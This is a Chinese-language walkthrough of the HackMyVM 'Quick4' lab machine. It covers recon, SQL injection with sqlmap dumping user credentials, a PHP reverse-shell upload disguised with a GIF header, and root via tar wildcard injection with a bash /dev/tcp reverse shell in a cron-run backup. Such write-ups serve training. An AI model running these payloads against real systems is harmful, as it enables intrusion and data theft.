当前位置：首页 > news >正文

HakcMyVM-Quick4

news 2026/4/16 3:09:24

信息搜集

主机发现

┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.2.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 03:19 EDT Nmap scan report for quick4 (192.168.2.9) Host is up (0.00028s latency). MAC Address: 08:00:27:AA:84:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for kali (192.168.2.15) Host is up. Nmap done: 256 IP addresses (7 hosts up) scanned in 43.54 seconds

端口扫描

┌──(kali㉿kali)-[~] └─$ nmap -sV -p- 192.168.2.9 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 03:21 EDT Nmap scan report for quick4 (192.168.2.9) Host is up (0.00057s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) MAC Address: 08:00:27:AA:84:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

漏洞利用

目录枚举

┌──(kali㉿kali)-[~] └─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.2.9 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.9 [+] Method: GET [+] Threads: 10 [+] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,php,txt,jpg,png,zip,git [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 276] /images (Status: 301) [Size: 311] [--> http://192.168.2.9/images/] /index.html (Status: 200) [Size: 51414] /.html (Status: 403) [Size: 276] /img (Status: 301) [Size: 308] [--> http://192.168.2.9/img/] /modules (Status: 301) [Size: 312] [--> http://192.168.2.9/modules/] /careers (Status: 301) [Size: 312] [--> http://192.168.2.9/careers/] /css (Status: 301) [Size: 308] [--> http://192.168.2.9/css/] /lib (Status: 301) [Size: 308] [--> http://192.168.2.9/lib/] /js (Status: 301) [Size: 307] [--> http://192.168.2.9/js/] /customer (Status: 301) [Size: 313] [--> http://192.168.2.9/customer/] /404.html (Status: 200) [Size: 5014] /robots.txt (Status: 200) [Size: 32] /fonts (Status: 301) [Size: 310] [--> http://192.168.2.9/fonts/] /employee (Status: 301) [Size: 313] [--> http://192.168.2.9/employee/] /.php (Status: 403) [Size: 276] /.html (Status: 403) [Size: 276] /server-status (Status: 403) [Size: 276] /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276] Progress: 9482032 / 9482040 (100.00%) =============================================================== Finished ===============================================================

看一下/robots.txt

┌──(kali㉿kali)-[~] └─$ curl http://192.168.2.9/robots.txt User-agent: * Disallow: /admin/

/admin是404，/employee得到一个登陆页面

尝试一下SQL注入

┌──(kali㉿kali)-[~] └─$ sqlmap -r sql --batch --dbs available databases [5]: [*] `quick` [*] information_schema [*] mysql [*] performance_schema [*] sys ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql --batch -D quick --tables Database: quick [2 tables] +-------+ | cars | | users | +-------+ ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql --batch -D quick -T cars --dump Database: quick Table: cars [4 entries] +----+---------+-------+---------+--------+---------------+ | id | user_id | brand | type | year | license_plate | +----+---------+-------+---------+--------+---------------+ | 1 | 4 | Ford | Mustang | 1963 | ABC123 | | 2 | 6 | Honda | Civic | 2012 | DEF456 | | 3 | 7 | Mazda | mx5 | 2004 | GHIJ56 | | 4 | 8 | Dodge | RAM1000 | 2020 | KLM789 | +----+---------+-------+---------+--------+---------------+ ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql -D quick -T users --columns --batch Database: quick Table: users [6 columns] +-----------------+-------------------------------------+ | Column | Type | +-----------------+-------------------------------------+ | name | varchar(255) | | role | enum('admin','employee','customer') | | email | varchar(255) | | id | int | | password | varchar(255) | | profile_picture | varchar(255) | +-----------------+-------------------------------------+ ┌──(kali㉿kali)-[~] └─$ sqlmap -r sql -D quick -T users -C email,password,role --dump --threads=10 --batch Database: quick Table: users [28 entries] +-----------------------------------+----------+--------------------+ | email | role | password | +-----------------------------------+----------+--------------------+ | a.lucky@email.hmv | customer | c1P35bcdw0mF3ExJXG | | andrew.speed@quick.hmv | employee | o30VfVgts73ibSboUP | | b.clintwood@email.hmv | customer | 2yLw53N0m08OhFyBXx | | coos.busters@quick.hmv | employee | f1CD3u3XVo0uXumGah | | d.trumpet@email.hmv | customer | f64KBw7cGvu1BkVwcb | | dick_swett@email.hmv | customer | y6KA4378EbK0ePv5XN | | frank@email.hmv | customer | 155HseB7sQzIpE2dIG | | fred.flinstone@email.hmv | customer | qM51130xeGHHxKZWqk | | info@quick.hmv | admin | Qe62W064sgRTdxAEpr | | j.bond@email.hmv | customer | 7wS93MQPiVQUkqfQ5T | | j.daniels@email.hmv | customer | yF891teFhjhj0Rg7ds | | j.doe@email.hmv | customer | 0i3a8KyWS2IcbmqF02 | | jack.black@email.hmv | customer | 1Wd35lRnAKMGMEwcsX | | jane_smith@email.hmv | customer | pL2a92Po2ykXytzX7y | | jeff.anderson@quick.hmv | employee | 5dX3g8hnKo7AFNHXTV | | john.smith@quick.hmv | employee | 5Wqio90BLd7i4oBMXJ | | juan.mecanico@quick.hmv | employee | 5a34pXYDAOUMZCoPrg | | k.ball@email.hmv | customer | k1TI68MmYu8uQHhfS1 | | lara.johnson@quick.hmv | employee | 5Y7zypv8tl9N7TeCFp | | laura.johnson@email.hmv | customer | 95T3OmjOV3gublmR7Z | | lee.ka-shingn@quick.hmv@quick.hmv | employee | am636X6Rh1u6S8WNr4 | | m.monroe@email.hmv | customer | f64KBw7cGvu1BkVwcb | | mike.cooper@quick.hmv | employee | Rh978db3URen64yaPP | | misty.cupp@email.hmv | customer | c1P35bcdw0mF3ExJXG | | n.down@email.hmv | customer | Lj9Wr562vqNuLlkTr0 | | nick.greenhorn@quick.hmv | employee | C3ho049g4kwxTxuSUA | | s.hutson@email.hmv | customer | sF217VruHNj6wbjofU | | t.green@email.hmv | customer | 7zQ19L0HhFsivH3zFi | +-----------------------------------+----------+--------------------+

用admin权限账号info@quick.hmv，成功登录进后台，发现可以上传头像文件

尝试上传一个反弹shell

<?php $sock=fsockopen("192.168.2.15",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

抓包以后在前面添加一个GIF8;，伪装成图片

GIF8; <?php $sock=fsockopen("192.168.2.15",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

它是上传到了nick用户，我们切换过去

┌──(kali㉿kali)-[~] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.2.15] from (UNKNOWN) [192.168.2.9] 49508 id uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

script /dev/null -c bash Script started, output log file is '/dev/null'. www-data@quick4:/var/www/html/employee/uploads$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@quick4:/var/www/html/employee/uploads$ sudo -l sudo -l [sudo] password for www-data: www-data@quick4:/var/www/html/employee$ find / -perm -4000 -type f 2>/dev/null <ml/employee$ find / -perm -4000 -type f 2>/dev/null /snap/snapd/19457/usr/lib/snapd/snap-confine /snap/snapd/20671/usr/lib/snapd/snap-confine /snap/core20/1974/usr/bin/chfn /snap/core20/1974/usr/bin/chsh /snap/core20/1974/usr/bin/gpasswd /snap/core20/1974/usr/bin/mount /snap/core20/1974/usr/bin/newgrp /snap/core20/1974/usr/bin/passwd /snap/core20/1974/usr/bin/su /snap/core20/1974/usr/bin/sudo /snap/core20/1974/usr/bin/umount /snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/1974/usr/lib/openssh/ssh-keysign /snap/core20/2105/usr/bin/chfn /snap/core20/2105/usr/bin/chsh /snap/core20/2105/usr/bin/gpasswd /snap/core20/2105/usr/bin/mount /snap/core20/2105/usr/bin/newgrp /snap/core20/2105/usr/bin/passwd /snap/core20/2105/usr/bin/su /snap/core20/2105/usr/bin/sudo /snap/core20/2105/usr/bin/umount /snap/core20/2105/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/2105/usr/lib/openssh/ssh-keysign /usr/libexec/polkit-agent-helper-1 /usr/bin/sudo /usr/bin/pkexec /usr/bin/passwd /usr/bin/fusermount3 /usr/bin/chfn /usr/bin/mount /usr/bin/su /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/gpasswd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign www-data@quick4:/var/www/html/employee$ getcap -r / 2>/dev/null getcap -r / 2>/dev/null /snap/core20/1974/usr/bin/ping cap_net_raw=ep /snap/core20/2105/usr/bin/ping cap_net_raw=ep /usr/bin/ping cap_net_raw=ep /usr/bin/mtr-packet cap_net_raw=ep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep //发现每分钟执行一次/usr/local/bin/backup.sh www-data@quick4:/var/www/html/employee$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh # You can also override PATH, but by default, newer versions inherit it from the environment #PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */1 * * * * root /usr/local/bin/backup.sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # www-data@quick4:/var/www/html/employee$ ls -la /usr/local/bin/backup.sh ls -la /usr/local/bin/backup.sh -rwxr--r-- 1 root root 75 Feb 12 2024 /usr/local/bin/backup.sh //tar使用通配符，文件名被当成tar参数解析 www-data@quick4:/var/www/html/employee$ cat /usr/local/bin/backup.sh cat /usr/local/bin/backup.sh #!/bin/bash cd /var/www/html/ tar czf /var/backups/backup-website.tar.gz * www-data@quick4:/var/www/html/employee$ cd /var/www/html/ cd /var/www/html/ //创建恶意文件 www-data@quick4:/var/www/html$ touch -- "--checkpoint=1" touch -- "--checkpoint=1" www-data@quick4:/var/www/html$ touch -- "--checkpoint-action=exec=bash shell.sh" <$ touch -- "--checkpoint-action=exec=bash shell.sh" //写入反弹shell www-data@quick4:/var/www/html$ echo "bash -i >& /dev/tcp/192.168.2.15/1234 0>&1" > shell.sh <h -i >& /dev/tcp/192.168.2.15/1234 0>&1" > shell.sh www-data@quick4:/var/www/html$ chmod +x shell.sh chmod +x shell.sh //执行时会变为tar czf ... --checkpoint=1 --checkpoint-action=exec=bash shell.sh * ┌──(kali㉿kali)-[~] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.2.15] from (UNKNOWN) [192.168.2.9] 33590 bash: cannot set terminal process group (61796): Inappropriate ioctl for device bash: no job control in this shell root@quick4:/var/www/html# id id uid=0(root) gid=0(root) groups=0(root)

查看全文

http://www.jsqmd.com/news/647992/